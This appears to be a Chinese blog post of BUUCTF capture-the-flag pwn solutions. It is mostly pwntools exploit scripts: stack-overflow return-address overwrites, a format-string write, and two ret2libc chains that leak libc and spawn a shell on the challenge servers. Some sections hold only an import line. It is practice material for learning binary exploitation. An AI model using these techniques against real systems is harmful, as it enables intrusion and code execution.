pwn_浅学一下
BUUCTF 刷题记录：
rip
简单的栈溢出：
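from pwn import *

# rip (BUUCTF): plain stack overflow that overwrites the saved return address.
# Default is a local run; the commented remote line is the instance the author used.
# r=remote('node3.buuoj.cn',29386)
r = process('./pwn1')

# Hard-coded address from the author's analysis of ./pwn1; it is only valid for
# that exact binary (presumably a non-PIE build -- confirm with checksec).
shell_addr = 0x401186

# 0xF + 8 is the author's distance from the buffer start to the saved return
# address (buffer plus saved rbp, presumably; the layout is not shown on the page).
# The +1 on the target is not explained here -- confirm the intended landing
# instruction in a disassembler before reusing it.
payload = b'a' * (0xF + 8) + p64(shell_addr + 1)
r.sendline(payload)
r.interactive()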
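from pwn import *

# warmup_csaw_2016 (BUUCTF): same shape as the rip script above -- overflow into
# the saved return address. Remote by default; the process line is the local variant.
r = remote('node5.buuoj.cn', 29716)
# r = process('./warmup_csaw_2016')

# Hard-coded from the author's analysis; only valid for that exact binary.
addr = 0x40060d

# 64 + 8: buffer plus saved rbp, per the author's layout (not shown on the page).
# The +1 on the target is unexplained here -- confirm in a disassembler.
payload = b'a' * (64 + 8) + p64(addr + 1)
r.sendline(payload)
r.interactive()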
ciscn_2019_c_1
还是栈溢出：
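from pwn import *

# NOTE(review): the section heading says ciscn_2019_c_1, but the local-run
# comment below names ./ciscn_2019_n_1 -- check which challenge this script
# actually belongs to.
r = remote('node5.buuoj.cn', 28905)
# r = process('./ciscn_2019_n_1')

# Fill 0x30 - 0x4 bytes, then overwrite the following 8 bytes with 0x41348000.
# Read as a 32-bit IEEE-754 float that bit pattern is 11.28125, which is
# presumably the value the binary compares against -- confirm against the binary;
# the page does not explain the constant.
payload = b'a' * (0x30 - 0x4) + p64(0x41348000)
r.sendline(payload)
r.interactive()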
pwn1_sctf_2016
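from pwn import *  # NOTE(review): only the import line of this script survived in the page source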
jarvisoj_level0
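from pwn import *  # NOTE(review): only the import line of this script survived in the page source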
[第五空间2019 决赛]PWN5
格式化字符串（有空再写写）：
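from pwn import *

# [第五空间2019 决赛]PWN5 (BUUCTF): format-string write.
r = remote('node5.buuoj.cn', 29205)
# r = process('./pwn')
# r = gdb.debug('./pwn', """
# b *0x080492EF
# cl
# """)

# Four consecutive addresses (0x804c044..0x804c047) are placed at the start of
# the input; the directives below refer to format arguments 10..13, which the
# author determined to be where these land (the offset is not derivable from
# the page -- re-check it if the binary changes).
payload = p32(0x804c044) + p32(0x804c045) + p32(0x804c046) + p32(0x804c047)
# Each %Nc pads the output, then the following directive stores the running
# character count into the corresponding address: one full %n write, then
# three single-byte %hhn writes.
payload += (b'%223c%10$n'
            b'%222c%11$hhn'
            b'%222c%12$hhn'
            b'%85c%13$hhn')
r.sendline(payload)
# Second input: the decimal string of 0xabcdef. Sent as bytes like every other
# send in this script, instead of relying on pwntools' implicit str encoding
# (which emits a warning on Python 3).
r.sendline(str(0xabcdef).encode())
r.interactive()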
jarvisoj_level2
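from pwn import *  # NOTE(review): only the import line of this script survived in the page source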
本地没问题，远程出 bug，感受到了神奇的魔法波动～
[NewStarCTF 公开赛赛道]ret2libc
ret2libc 的题，以后也得找个机会写一下：
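from pwn import *
from LibcSearcher import *

# [NewStarCTF 公开赛赛道]ret2libc (BUUCTF).
# Stage 1 leaks the runtime address of puts by calling puts@plt with puts@got as
# its argument and then returns to main; stage 2 resolves the libc build with
# LibcSearcher and calls system("/bin/sh") through the same overflow.
# r = process('./ret2libcpwn')
r = remote('node5.buuoj.cn', 25091)
elf = ELF('./ret2libcpwn')

# Hard-coded addresses from the author's analysis of ./ret2libcpwn (presumably a
# non-PIE build); only valid for that exact binary.
main = 0x400698
pop_rdi = 0x400753
ret = 0x40050e
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

PROMPT = b'Glad to meet you again!What u bring to me this time?\n'
PADDING = b'a' * (0x20 + 8)  # buffer plus saved rbp, per the author's layout

# Stage 1: leak puts@got, then re-enter main so the overflow can be used again.
payload = PADDING
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendlineafter(PROMPT, payload)
data = r.recvuntil(b'\n')  # first reply line is discarded; its content is not shown on the page
print("Received raw data:", data)
# The leaked pointer is shorter than 8 bytes: drop the newline and right-pad.
puts_addr = u64(r.recvline()[:-1].ljust(8, b'\0'))
print("puts_addr ====>", hex(puts_addr))

# Stage 2: derive the libc base from the leak, then system("/bin/sh").
libc = LibcSearcher('puts', puts_addr)
offset = puts_addr - libc.dump('puts')
binsh = offset + libc.dump('str_bin_sh')
system = offset + libc.dump('system')
payload = PADDING
# Extra ret before pop_rdi is the author's choice; commonly done to keep the
# stack 16-byte aligned when entering system -- confirm in a debugger.
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
r.sendlineafter(PROMPT, payload)
r.interactive()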
[NewStarCTF 2023 公开赛道]ret2libc
和上一道几乎一模一样：
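from pwn import *
from LibcSearcher import *

# [NewStarCTF 2023 公开赛道]ret2libc (BUUCTF): same two-stage ret2libc as the
# previous script, with this binary's addresses and prompt.
r = remote('node5.buuoj.cn', 25667)
# r = process('./newstarCTFret2libc')
elf = ELF('./newstarCTFret2libc')

# Hard-coded addresses from the author's analysis of ./newstarCTFret2libc
# (presumably a non-PIE build); only valid for that exact binary.
main = 0x400698
pop_rdi = 0x400763
ret = 0x400506
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

PROMPT = b'Show me your magic again'  # delimiter passed as bytes, as sendlineafter expects
PADDING = b'a' * (0x20 + 8)  # buffer plus saved rbp, per the author's layout; all bytes

# Stage 1: leak puts@got via puts@plt, then return to main for a second overflow.
payload = PADDING
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendlineafter(PROMPT, payload)
# Two reply lines are consumed and printed before the leak; their content is not
# shown on the page.
data = r.recvuntil(b"\n")
print("Received raw data:", data)
data2 = r.recvuntil(b"\n")
print("Received raw data2:", data2)
# The leaked pointer is shorter than 8 bytes: drop the newline and right-pad.
puts_addr = u64(r.recvline()[:-1].ljust(8, b'\0'))
print(hex(puts_addr))

# Stage 2: derive the libc base from the leak, then system("/bin/sh").
libc = LibcSearcher('puts', puts_addr)
offset = puts_addr - libc.dump('puts')
binsh = offset + libc.dump('str_bin_sh')
system = offset + libc.dump('system')
payload = PADDING
# Extra ret before pop_rdi is the author's choice; commonly done to keep the
# stack 16-byte aligned when entering system -- confirm in a debugger.
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
r.sendlineafter(PROMPT, payload)
r.interactive()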
ciscn_2019_c_1
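from pwn import *  # NOTE(review): only the import line of this script survived in the page source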



